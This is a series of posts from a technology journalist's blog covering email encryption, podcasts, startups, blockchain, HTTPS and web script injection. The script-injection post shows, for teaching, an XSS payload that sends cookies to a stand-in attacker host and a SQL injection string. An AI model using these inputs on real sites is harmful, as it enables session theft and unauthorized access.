Email encryption has become almost frictionless

As you loyal readers know (I guess that should just be “readers,” since it implies some of you are disloyal), I have been using and writing about email encryption for two decades. It hasn’t been a bowl of cherries, to be sure. Back in 1998, when Marshall Rose and I wrote our landmark book “Internet Messaging,” we said that the state of secure Internet email standards and products was best described as “a sucking chest wound.” Lately I have seen some glimmers of hope in this much-maligned product category.

Last week Network World posted my review of five products. Two of them I reviewed in 2015: HPE/Voltage Secure Email and Virtru Pro. The other three are Inky (an end-to-end product), Zix Gateway, and Symantec Email Security.cloud. Zix was the overall winner. We’ll get to the results of these tests in a moment.

In the past, encryption was frankly a pain in the neck. Users hated it, either because they had to manage their own encryption key stores or because they had to go through additional steps to encrypt and decrypt their message traffic. As a consequence, few people used it for their email, and most who did used it under protest. One of the more notable “conscientious objectors” was none other than the inventor of PGP himself, Phil Zimmermann. In this infamous Motherboard story, the reporter tried to get him to exchange encrypted messages. Zimmermann sheepishly revealed that he was no longer using his own protocols, due to difficulties in getting a Mac client operational.

To make matters worse, if a recipient wasn’t using the same encryption provider as you, sending a message was a very painful process. If you had to use more than one system, it was even more trouble. I think I can safely say those days are coming to an end, and that encryption is becoming almost completely frictionless.

By that I mean there are situations where you don’t have to do anything other than click the “send” button in your emailer, and off the message goes. The encryption happens under the covers. This means that encryption can be used more often, and that means companies can be more secure in their message traffic.

This comes just in time, as the number of email hacks is increasing. And it is happening not only with email traffic, but with texting and instant-message chats as well. Last week Check Point announced a way to intercept supposedly encrypted traffic from WhatsApp, and another popular chat service, Confide, was also shown to be subject to impersonation attacks.

So will that be enough to convince users to start using encryption for normal, everyday emailing? I hope so. As the number of attacks and malware infections increases, enterprises need all the protection they can muster, and encrypting emails is a great place to start.

What I liked about Zix and some of the other products I tested this time around is that they take steps to hide key management from the users. Zimmermann would find this acceptable, to be sure. Some other products come close by using identity-based encryption, which makes it easier to onboard a new user with a few simple mouse clicks.

Also intriguing is how Zix and others have incorporated data loss prevention (DLP) into their encryption products. What this means is that these systems detect when sensitive information is about to be transmitted via email and take steps to encrypt or otherwise protect the message, both in transit and in how it will ultimately be consumed on the receiving end.
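
To make that concrete, here is a minimal sketch of the kind of pattern matching a DLP engine performs before deciding to encrypt an outbound message. The patterns and policy here are my own illustration, not any vendor’s actual rules:

```python
import re

# Illustrative patterns only -- real DLP engines use far richer rule sets,
# validity checks (e.g., the Luhn algorithm for card numbers) and contextual scoring.
PATTERNS = {
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "credit_card": re.compile(r"\b(?:\d[ -]?){13,16}\b"),
}

def needs_encryption(message_body: str) -> bool:
    """Return True if the outbound message appears to contain sensitive data."""
    return any(p.search(message_body) for p in PATTERNS.values())

if needs_encryption("Please wire funds; my SSN is 123-45-6789"):
    print("Policy match: route message through the encryption gateway")
```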

DLP has gone from something “nice to have” to an essential part of business compliance, and the steady stream of data leak hacks has only increased its importance. Having this integration can be a big selling point for making the move to an encrypted email vendor, and we are glad to see this feature getting easier to use and to manage in these products.

Finally, the products have gotten better at what I call multi-modal email contexts. Users today frequently switch from their Outlook desktop client to their smartphone email app to a webmailer to keep track of their email stream. Handling these different modalities is critical if a product is going to make a claim to being frictionless.

So why did Zix win? It was easy to install and manage, well-documented, and had plenty of solid encryption features (see the screenshot here). Its only downside was the lack of a mobile client for composing encrypted messages, but it got partial credit for a responsively designed webmailer that worked well on a phone’s small screen. Zix also includes its DLP features as part of its basic pricing structure, another plus.

We have come a long way on the encrypted email road. It is nice to finally have something nice to say about these products after all these years.

FIR B2B #69 podcast: Fighting comment trolls and tracking CMO spending trends

We start off by exploring how to fight comment trolling. While trolls have been around since before the dawn of the internet, it seems we have few ways to fight them and restore civility, or at least move towards some semblance of it. A story on Nieman Lab’s blog tells how a Norwegian site is “taking the edge off rant mode” by making readers pass a quiz before commenting. The theory is that if readers actually read an article and prove that they understand the basic issues, their comments will be more meaningful. It is a nice start. (see screenshot here)

Then there is this new protocol from Google that harnesses machine learning techniques to help publishers thwart abusive comments online. Google has published an API and has a demonstration on its website that shows you how you can use it. Paul and David debate whether it is safe to turn on comments on your own blog, and recommend some kind of human oversight to keep things on point. Sadly, you still have to fight off the trolls for now.

Our next item comes from Shel, who pointed out a survey showing that 80% of B2B companies overlook customer renewal messaging. We don’t understand why this very important audience continues to be overlooked by marketers. Consider this tidbit: 42% of respondents say their companies invest less than 10% of their marketing budgets in renewal messaging efforts. “Research shows the story you need to tell to protect existing customer relationships is actually the antithesis of the disruptive, attention-grabbing story you need to tell to acquire net new customers.”

Finally, we examine the latest CMO survey from Duke’s Fuqua School of Business. It found that spending on marketing analytics is expected to leap from 4.6% to almost 22% of marketing budgets in the next three years. But marketers say barely a third of available data is actually used, because managers lack the tools to measure the success of analytics and the people who can link the data to marketing practice. We opine on why this is so, and why social media continues to be stuck in a perennial “almost ready” status.

You can listen to our 17-minute podcast here:

How St. Louis has become a startup mecca

Over the past several years, St. Louis has been recognized by a number of national publications as one of the fastest-growing startup locations in the country. Having lived here for more than a decade, I have observed this first-hand, working as a volunteer mentor to dozens of new ventures as part of the IT Entrepreneur’s Network (ITEN). I recently had a chance to interview many founders of new companies and thought I would provide a few insights into why my adopted city has taken a leadership position in the startup world.

One reason is certainly an expanding ecosystem to support entrepreneurs. There is a critical mass of mentors, potential founders, funders, and startup-oriented resources that continues to feed on itself. Ten years ago, there weren’t many organizations or resources for startups. That has changed dramatically.

Another reason is that the cost of living here is low, especially when compared to both coasts. “It is less expensive to make the mistakes that you are inevitably going to make, and the range of people invested in your success is huge,” said Mark Sawyier, who launched his company Bonfyre in 2011. “The only thing you know for sure about your initial business plan is that it is wrong. You have to be flexible and adaptable and have a greater appreciation for getting advice. The way a business responds to failure isn’t a single moment in time, but how they can retain what they have learned from that experience and move on.”

The coasts do offer some advantages, however. “Coastal investors are more comfortable with a SaaS model than their midwestern counterparts. But they also need you to be at a certain level of scale,” says Chris Deck, who has run his own ecommerce venture for almost 20 years. “The challenge to being in St. Louis is that the model to raise funds from the tech perspective is different, and you spend a lot of time talking about metrics that aren’t applicable to the SaaS business model.” Some startups have adopted a hybrid hiring model, basing their salespeople in the Bay Area for just this reason while keeping the remainder of their staff here.

Another reason why St. Louis is rising is because it is getting easier to find local talent. While that used to be more difficult, many of the founders I spoke to no longer had that issue. Sawyier said, “There is this misconception that there isn’t any local talent in St. Louis. That is not true at all. It amazes me that people are always surprised at the concentration of IT-related organizations around the area. These businesses are continually creating talent and new opportunities.”

One way to track the growth of the ecosystem is the number of co-working spaces around the region. When I first arrived there were none; now there are at least 20, and new ones are popping up regularly. Most of the spaces are operating at near capacity, and what is more important than the number of offices is that many companies have outgrown their initial space and moved into new offices, with some even buying their own buildings.

Another is the sheer dollars that local funds are investing in startups. The amount has risen over the past several years, and while it isn’t at the level of an Austin, Boston, or Sand Hill Road, it is enough to motivate many founders to relocate here for their business.

One of the ITEN programs that I have been involved with is called Mock Angels. A founder pitches his or her business as if appearing before a group of VCs, who afterwards comment on the pitch and what can be improved. The theory is that this refines the pitch, so that when a real VC is on the receiving end the founder will be prepared and get funding. This isn’t unique to St. Louis; similar programs can be found in other places. But what is different is that the Mock Angels do more than just carp about the slide deck. What I have seen is that these meetings are a good jumping-off point for many founders to receive intensive mentoring from the Angels: one startup ended up talking to 20 different mentors to get a better take on what to do next.

As an example, let’s look at the story of Focalcast, a startup that provides live collaboration among tablet computers. They began by being accepted into the Capital Innovators accelerator program and moved to the St. Louis area. Then they came to ITEN and graduated from Mock Angels, and then got an Arch Grant and additional funding from the Missouri Technology Corporation. With each organization, they improved their pitch, refined their product offering, and interacted with potential investors, mentors, and other specialists. “We couldn’t have gotten as far as we did without all this support from the various St. Louis programs,” said Devin Turner, their CEO. “All of them were instrumental in our success, and we have enormous respect for the St. Louis startup ecosystem. Each of these programs complements the others and works well for startups. We think St. Louis is a pretty special place and is a really great place for a young company to be located.” Turner’s pitch was torn up at his first Mock Angels session. “But we ended up working with one of the participants who went from saying that our business model didn’t make any sense to being a big advocate and a huge help for us to go to market and raise funds.”

As another example, look at Amanda Patterson, the CEO of a health-care training-related startup called The Call List. She received a great deal of mentoring from the folks she met at ITEN. “I was able to refine my business plan and introduce myself to people in the healthcare community that could apply my technology. When I first applied, I thought of Mock Angels as more of a gateway that I needed to pass through so I could apply for venture funding, but I realized that it is a way to develop a sustainable model and to train me to become a better business leader. Even the mentors that were the most negative about my pitch had useful thoughts that helped shape my business.”

Another company that benefited from the local startup scene is Label Insight. They provide a database of food ingredients for a variety of vendors. “Before we came to St. Louis, we were mostly working out of our garages and on our own,” said Anton Xavier, one of their co-founders. “We really needed to put our company on steroids and grow into a real viable business. We found St. Louis an ideal place for this growth, and the second we came into contact with the startup ecosystem here, we flourished and were able to escalate our growth.”    

St. Louis has really blossomed as a startup mecca. When I first got here, it was a rare week that had any startup-related event, and it was easy to attend most of them and get to know the community. Now there are numerous events each evening, a testimonial to how rich a community we have built.

You can check out the Tech Startup Report from ITEN here if you want to read more about ITEN’s services and the St. Louis tech startup scene.

Network World review: Email encryption products are improving

Email encryption products have made major strides since I last looked at them nearly two years ago in this review for Network World. This week I had an opportunity to revisit these products, and found that they have gotten easier to use and deploy, thanks to a combination of user interface and encryption key management improvements. They are at the point where encryption can almost be called effortless on the part of the end user.

I reviewed five products: the two that I reviewed in 2015 (HPE/Voltage Secure Email and Virtru Pro) and three others (Inky, Zix Gateway, and Symantec Email Security.cloud). The overall winner was Zix (shown here). It was easy to install and manage, well-documented, and the encryption features were numerous and solid. The only drawback was that Zix lacks a separate mobile client to compose messages, but having a very responsive mobile web app made up for most of this issue.

You can read the complete review in Network World here, and you can watch a screencast video comparing how three of the products handle data leak protection:

FIR B2B Podcast #68: We are feeling grumpy today

This week Paul is crabby because of some bad PR experiences. He had an interview with one company that probably had seen “All the President’s Men” too many times and was confused about when something can go on background or off the record. Once something has been said, it is on the record.

Another all-too-common tactic is to send multiple follow-up emails: “hope you had a nice weekend” (it is Tuesday, thank you very much) “and check back with you.” Really?

In the news last week was the Amazon S3 outage. Paul got several emails with offers of sources to comment on the dire state of affairs of the Internet. (Didn’t you know? Neither did we.)

To round out our sourpuss series, we have this report from the DC-based policy think tank the Information Technology and Innovation Foundation. The study shows the tenor of tech reporting has become more pessimistic over the years, with contributing factors including a more realistic understanding of the effects of tech, more sensationalist headlines, and more people (including some news organizations) who want to use tech threats for their own particular purposes.

The rise of blockchain-as-a-service

With the announcement last week of the Enterprise Ethereum Alliance, it is timely to look at what is going on with blockchain technologies. The Alliance was formed to encourage a hybrid kind of blockchain with both public and private aspects. Its members include cutting-edge startups along with established computer vendors such as Microsoft and major banks such as ING and Credit Suisse. As mentioned in this post by Tom Ding, a developer at String Labs, the Alliance could bring these disparate organizations together to find best-of-breed blockchain solutions that could benefit a variety of corporate development efforts.

When Bitcoin was invented, it was based on a very public blockchain database, one in which every transaction was open to anyone’s inspection. A public chain also allows anyone to create a new block, as long as they follow the protocol specs. But as blockchains matured, enterprises wanted something a bit more private, with better control over the transactions for their own purposes and over who is trusted to make new blocks.
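
To see why anyone can extend a public chain so long as they follow the rules, here is a toy Python sketch of hash-linked blocks. It is only the basic data structure; real chains layer consensus rules, proof-of-work and digital signatures on top of this:

```python
import hashlib
import json
import time

def make_block(prev_hash: str, transactions: list) -> dict:
    """Create a block whose identity depends on its predecessor's hash."""
    block = {
        "timestamp": time.time(),
        "transactions": transactions,
        "prev_hash": prev_hash,
    }
    block["hash"] = hashlib.sha256(
        json.dumps(block, sort_keys=True).encode()
    ).hexdigest()
    return block

genesis = make_block("0" * 64, ["coinbase"])
block1 = make_block(genesis["hash"], ["alice -> bob: 5"])

# Tampering with genesis would change its hash and break the link to block1.
print(block1["prev_hash"] == genesis["hash"])
```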

This isn’t a mutually exclusive decision, and what is happening now is that many blockchain solutions use aspects from both public and private perspectives, as you can see from this infographic from Let’s Talk Payments.

You want the benefits of having multiple programmers hammering against an open source code base, with incentives for the blockchain community to improve the code, and the overall network effects as more people enter this ecosystem. You also gain efficiencies as the number of developers scales up, and perhaps future benefits from interoperability among the various blockchain implementations. At least, that is the theory espoused in a recent post on Medium, where R Tyler Smith writes: “One thing that blockchains do extremely well is allow entities who do not trust one another to collaborate in a meaningful way.”

The Ethereum Alliance is just the latest milepost showing that blockchains are becoming potentially more useful for enterprise developers. Over the past year, several blockchain-as-a-service (BaaS) offerings have been introduced that make it easy to create your own blockchain with just a few clicks. Back in November 2015, Microsoft and ConsenSys built the first BaaS on top of Azure and now have several blockchain services available there. IBM followed in February 2016 with its own BaaS offering on BlueMix. IBM has a free starter plan that you can experiment with before you start spending serious money on its cloud implementations. Microsoft’s implementation is available through its Azure Marketplace; there is no additional charge for blockchain services beyond the cloud-based compute, network and storage resources used.

IBM’s BlueMix isn’t the only place the vendor has been active in this area: the company has been instrumental in supporting open source blockchain code, with large commitments to the Hyperledger project. Not to be left out, the Amazon Web Services marketplace offers two blockchain-related services. Finally, Deloitte has its own BaaS offering as part of its Toronto-based blockchain consulting practice.
If you want to get started with BaaS, here is just one of the numerous training videos available on the Microsoft Virtual Academy that covers the basics. There is also this informative white paper that goes into more detail about how to deploy the Microsoft version of BaaS. IBM also has an informative video on some of the security issues you should consider here. (reg. req.)

Security Intelligence blog: Making the Move to an All-HTTPS Network

Many website operators have wrestled with the decision to move all their web infrastructure to support HTTPS. The upside is obvious: better protection and a more secure pathway between browser and server. However, it isn’t all that easy to make the switch. In this piece that I wrote for IBM’s Security Intelligence blog, I bring up the case study of The Guardian’s website and what its team did to make the transition. It took them more than a year and a lot of careful planning before they could fully support HTTPS.
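
For a flavor of the sanity checks such a migration involves, here is a small Python sketch of my own (not from the Guardian piece) that verifies a plain-HTTP request gets redirected to HTTPS and that the HSTS header is being served:

```python
import urllib.request

def check_https_migration(host: str) -> None:
    """Verify an HTTP request is redirected to HTTPS and HSTS is enabled."""
    # urlopen follows redirects, so the final URL tells us where we landed.
    resp = urllib.request.urlopen(f"http://{host}/", timeout=10)
    print("Final URL:", resp.geturl())  # should start with https://
    print("HSTS:", resp.headers.get("Strict-Transport-Security"))

check_https_migration("www.theguardian.com")  # the site discussed above
```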

Block that script!

It used to be so simple to understand how a web browser and a web server communicated. The server held a bunch of HTML pages and sent them to the browser when a user typed in a URL and navigated to that location. The HTML sent back to the browser was pretty much human-readable, which meant anyone with a little programming knowledge and a basic grasp of command syntax could figure out what was going on in the page.

I can say this because I remember learning HTML code in those early days in a few days’ time. While I am not a programmer, I have written code in the distant past.

Those days (both of me writing any code and of easily parsed web pages) are so over now. Today’s web servers do a lot more than just transmit a bunch of HTML. They consolidate a great deal of information from a variety of sources: banners from ad networks, tracking images used for visitor analytics, tracking cookies for ecommerce sites (so they can figure out if you have been there before), content delivery network code and much more.

Quite frankly, if you look at all the work that a modern web server has to do, it is a wonder that any web page ends up looking as good as it does. But this note isn’t just about carping on that complexity. It is this very complexity that the bad guys have been exploiting for their own evil ways for many years, using what are called script injection techniques.

Basically, because of poorly written code on third-party websites or because of clever hacking techniques, an attacker can inject malware into a web page that can do just about anything, including gathering usernames and passwords without the user’s knowledge.
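
Here is a toy illustration (not any particular site’s code) of how unescaped third-party content becomes an injected script, and how simple output encoding defuses it:

```python
from html import escape

# A "comment" supplied by an attacker: markup, not plain text.
user_comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Unsafe: the comment is interpolated verbatim, so the script would run in the page.
unsafe_page = f"<p>Latest comment: {user_comment}</p>"

# Safe: escaping turns the markup into inert text the browser merely displays.
safe_page = f"<p>Latest comment: {escape(user_comment)}</p>"

print(unsafe_page)
print(safe_page)
```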

One type of injection, SQL injection, sits near the top of the list of most frequent attacks year after year. This is because it is easy to do, it is easy to find targets, and it gets big results fast. It is also easy to fix, if you can convince your database and web developers to work together.
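
The fix usually comes down to parameterized queries. A minimal sketch using Python’s built-in sqlite3 module shows the difference:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

attacker_input = "' OR '1'='1"

# Vulnerable pattern: string concatenation lets the input rewrite the query.
# query = f"SELECT * FROM users WHERE name = '{attacker_input}'"

# Safe pattern: the placeholder keeps the input as data, never as SQL.
rows = conn.execute(
    "SELECT * FROM users WHERE name = ?", (attacker_input,)
).fetchall()
print(rows)  # [] -- the injection attempt matches nothing
```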

But there is another type of injection that is more insidious. Imagine what might happen if an ad network server were compromised so that it could target a small collection of users and insert a keylogger to capture their IDs and passwords. This could easily become a major data breach.

A variety of security tools have been invented to try to stop these injections from happening, including secure browsers (such as Authentic8.com), using various sandboxing techniques (such as Checkpoint’s Sandblast), running automated code reviews (such as with runtime application self-protection techniques from Vasco and Veracode), or by installing a browser extension that can block specific page content. None of these is really satisfactory or a complete solution.

If you are concerned about these kinds of injections, you might want to experiment with a couple of browser extensions. These are not new: many of these tools were created years ago to stop pop-up ads from appearing on your screen. They have gotten new attention recently because many ad networks want to get around the ad blockers (so they can continue to make money selling ads). But you can use these tools to augment your browser security too. If you are interested in trying one of them out, here is a good performance test of a variety of ad blockers done several years ago. There is another comparative review by Lifehacker, also several years old, that focuses on privacy features.

I was interested, so I have been running two of these extensions lately: Privacy Badger (shown here) and Ghostery. I wanted to see what kind of information they pick up and exactly how many third parties are part of my web transactions when I do my banking, buy stuff online, and connect to the various websites that I use to run my life. The number will surprise you: some sites have dozens of third-party sites contributing to their pages.
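
If you want a rough sense of those numbers without installing anything, here is a quick stdlib-only Python sketch that counts the third-party hosts referenced in a page’s static HTML. (The extensions watch live network requests, so they will see more than this does.)

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import urlopen

class ThirdPartyCounter(HTMLParser):
    """Collect the hostnames behind script/img/iframe tags on a page."""
    def __init__(self):
        super().__init__()
        self.hosts = set()

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "img", "iframe"):
            host = urlparse(dict(attrs).get("src", "")).netloc
            if host:
                self.hosts.add(host)

page_url = "https://www.example.com/"  # substitute any site you use
html = urlopen(page_url, timeout=10).read().decode("utf-8", "replace")
parser = ThirdPartyCounter()
parser.feed(html)

first_party = urlparse(page_url).netloc
third_parties = {h for h in parser.hosts if h != first_party}
print(len(third_parties), "third-party hosts:", sorted(third_parties))
```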

Privacy Badger comes from the Electronic Frontier Foundation and is focused on consumers who are concerned about their online privacy. When you call it up onscreen, it shows you a list of the third-party sites on the current page, with a simple three-position slider next to each one: you can block the originating domain entirely, block just its cookies, or allow it access. Ghostery works a bit differently, and ironically (or unfortunately) wants you to register before it provides more detailed information about third-party sites. It provides a short description of each ad network or tracking site that it discovers from reading the page you are currently browsing. The two tools cite different sites in their reports.

There are some small signs of hope on the horizon. An Israeli startup called Source Defense, now in beta, aims to secure your website from malicious third-party script injections such as keylogger insertions. I saw a short demo of it and it seems promising. Browsers are getting better too, with more control over pop-ups and third-party cookies and blocking of the more obvious malware attacks. But as browser security controls become more thorough, they also become more difficult to use. It is the nature of the Internet that security will always chase complexity.

FIR B2B podcast #67: Is it Time to Kill the Term ‘Content Marketing?’

In a recent LinkedIn post, Kyle Cassidy proposed Why ‘Content Marketing’ Needs to be Killed Dead and Buried Deep. Cassidy is a former ad agency content marketer who has grown tired of the term and wants to see it retired. His well-written – and somewhat tongue-in-cheek – post gives some solid reasons why the term should be put out of its misery, including over-inclusive usage that renders it meaningless, not unlike the cutesy names that are now applied to departments that used to be called “personnel” and “marketing.” Given that our hosts both come from a long-standing journalism tradition in which the quality of our words was Job #1, he does have some salient points to consider.

I had an opportunity to discuss this on a recent podcast that I do with Paul Gillin here. If you don’t know Paul, he is cut from the same cloth as I: a long-time technology journalist who has started numerous pubs and websites and has written several books.

Cassidy writes about the “hot mess of skills” that can be found in the typical content marketer, who as he says is “a steaming pile of possibility” that combines “a savvy copywriter, editor, and brand strategist” all rolled up into one individual. True enough: you need a lot of skills to survive these days. But one skill that he mentions only briefly is something that both Paul and I have in spades. We consider ourselves journalists first and marketers of our “content” a distant second.

Cassidy has a good point: “Content Marketing is a meaningless term. PR is content. Product is content. Blogs and social are content. Emails are content. Direct mail is content.” Yes, but. Not all content is created equal. Some content is based on facts, and some isn’t. Without a solid foundation in determining facts you can’t market anything, whether it is content or the latest music tracks. You have to speak truth to power, as the old Quaker saying goes.

Of course, fact-based journalism – what we used to call just “journalism” – is under siege as well these days, given the absence and abuse of facts streaming live every day from our nation’s capital. The notion of fake news – what we used to call rumors, exaggerations, lies and misleading statistics – is rife and widespread. And even the New York Times seems to have had trouble finding the right person to quote recently.

Part of me wants to assign blame to content marketers for these trends. But the real reason is just laziness on the part of writers, and the lack of editors who in the olden days – say ten years ago – used to work with them to sharpen their writing, find those lazy slips of the keyboard, and hold their fingers to the fire to make sure they checked their quotes, found another source, and deleted unsupported conclusions. I still work with some very fine editors today, and it is uncanny how quickly they can zoom in on a particular weak spot in my prose. Even after years of writing and thousands of published stories, I still mess up. It isn’t (usually) deliberate: we all make mistakes. But few of us can find and fix our own. Part of this is the online world we now inhabit.

But if the online world has decimated journalists, it has really taken its toll on editors, who are now few and infrequently seen. Few publications want to take the time to pass a writer’s work through an editor: the rubric is post first, fix later. Be the first to get something “out there,” irregardless (sic) of its accuracy. As I said, you can’t be your own editor, no matter how much experience you might have or how many words a week you publish. You need a second (and third) pair of eyes to see what you don’t.

When I first began in tech journalism in the mid-1980s, we had an entire team of copy editors working at “the desk,” as it was called. The publication I was working for at the time was called PC Week, and we put the issue to bed every Thursday night. No matter where in the world you were, on Thursday nights you had to be near a phone (and this was the era before cell phones were common).  You invariably got a call from the desk about something that was awry with your story. It was part of the job.

Several years ago, I was fortunate to do freelance work for the New York Times. It was a fun gig, but it wasn’t an easy one. By the time my stories were published in the paper, almost every word had been picked over and changed. Some of these changes were so subtle that I wouldn’t have seen them if the track-changes view wasn’t turned on. A few (and very few) times, I argued with the copy desk over some finer point. I never thought that I would miss those experiences. They seem like quaint historical curiosities now.

So let’s kill off the term content marketing, but let’s also remember that if we want our content to sing, it has to be true, fact-based, and accurate. Otherwise, it is just the digital equivalent of a fish wrapper.

Going back to our podcast, Paul and I next pick up on the dust-up between CrowdStrike and NSS Labs over a test of the former’s endpoint security products. CrowdStrike claims the NSS tests didn’t show its product in the best light and weren’t ‘authorized,’ and it has even taken NSS to court. Our view: too bad. If you don’t like the results, shame on you for not working more closely with the testers. And double shame for suing them. David has been on the other end of this scenario for a number of years and offers an inspiring anecdote about how a vendor can turn a pig’s ear into a silken test. Work with the testing press, and eventually you too can turn things around to benefit both of you.

Finally, we bring up the issue of a fake tweet being used by the New York Times and Newsmax regarding the firing of National Security Adviser Michael Flynn earlier this week. The Times eventually posted a correction, but if the Grey Lady of journalism can be fooled, it raises questions about how brands should work with parody or unauthorized social media accounts. Lisa Vaas has a great post on Naked Security that provides some solid suggestions on how to vet accounts in the future: look for the blue verification check mark, examine when the account was created and review the history of tweets.

You can listen to our podcast (23 min) here:

Lenny Zeltser is teaching us how malware operates

Lenny Zeltser has been teaching security classes at SANS for more than 15 years and has earned the prestigious GIAC Security Expert designation. He is not some empty suit but a hands-on guy who developed REMnux, a Linux toolkit used by malware analysts throughout the world. He is frequently quoted in the security trades, and he recently became VP of Products at Minerva Labs. He spoke to me about his approach to understanding incident response, endpoint protection and digital forensics.

“I can’t think about malware in the abstract,” he said. “I have to understand it in terms of its physical reality, such as how it injects code into a running process and uses a command and control network. This means I have to play with it to learn about it.”

“Malware has become more elaborate over the past decade,” he said. “It takes more effort to examine it now. Which is interesting, because at its core it hasn’t changed that much. Back a decade or so ago, bots were using IRC as their command-and-control channel. Now, of course, there are many more HTTP/HTTPS-based connections.”

One interesting trend is that “malware is becoming more defensive, as a way to protect itself from analysis and automated tools such as sandboxes. This makes sense because malware authors want to derive as much value as they can and try to hide from discovery. If a piece of malware sees that it is running on a test machine or inside a VM, it will just shut down or go to sleep.”

Why has he made the recent move to working for a security vendor? “One reason is because I want to use the current characteristics of malware to make better protective products,” he said. Minerva is working on products that try to trick malware into thinking it is running in a sandbox when it is actually sitting on a user’s PC, as a way to shut down the infection. Clever. “Adversaries are so creative these days. So two can play that game!”

Another current trend for malware is what is called “fileless,” or the ability to store as little as possible in the endpoint’s file system. While the name is somewhat misleading – you still need something stored on the target, whether it be a shortcut or a registry key – the idea is to have minimal and less obvious markers that your PC has been infected. “Something ultimately has to touch the file system and has to survive a reboot. That is what we look for.”
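
As a simple illustration of hunting for markers that survive a reboot, here is a Python sketch that enumerates the classic per-user Run key on Windows. This is only one spot; real forensics tools check many more persistence locations (services, scheduled tasks, WMI subscriptions):

```python
import winreg  # Windows only

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

def list_run_entries():
    """Enumerate programs registered to start at user logon."""
    entries = []
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:  # no more values under this key
                break
            entries.append((name, value))
            i += 1
    return entries

for name, command in list_run_entries():
    print(f"{name}: {command}")  # review anything you don't recognize
```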

Still, no matter how sophisticated a piece of malware is, there is always user error, which you can’t completely eliminate. “I still see insiders who inadvertently let malware loose – maybe they click on an email attachment or they let macros run from a Word document. Ultimately, someone is going to try to run malicious code someplace, and they will get it to where they want to.”

“People realize that threats are getting more sophisticated, but enterprises need more expertise too, and so we need to train people in these new skills,” he said. One challenge is being able to map out a plan post-infection. “What tasks do you perform first? Do you need to re-image an infected system? You need to see what the malware is doing, and where it has been across your network, before you can mitigate it and respond effectively,” he said. “It is more than just simple notification that you have been hit.”

I asked him to share one of his early missteps with me, and he mentioned when he worked for a startup tech company that was building web-based software. The firm wanted to make sure their systems were secure, and paid a third-party security vendor to build a very elegant and complex series of protective measures. “It was really beautiful, with all sorts of built-in redundancies. The only trouble was we designed it too well, and it ended up costing us an arm and a leg. We ended up overspending to the point where our company ran out of money. So it is great to have all these layers of protection, but you have to consider what you can afford and the business impact and your ultimate budget.”

Finally, we spoke about the progression of technology and how IT and security professionals are often unsure when it comes to the shock of the new. “First there were VLANs,” he said. “Initially, they were designed to optimize network performance and reduce broadcast domains. They were initially resisted by security professionals, but over time they were accepted and used for security purposes. The same thing happened with VMs and cloud technologies. And we are starting to see containers become more accepted as security professionals get used to them. The trick is to stay current and make sure the tools are advancing with the technology.”

Like what you are reading?

Subscribe to Inside Security!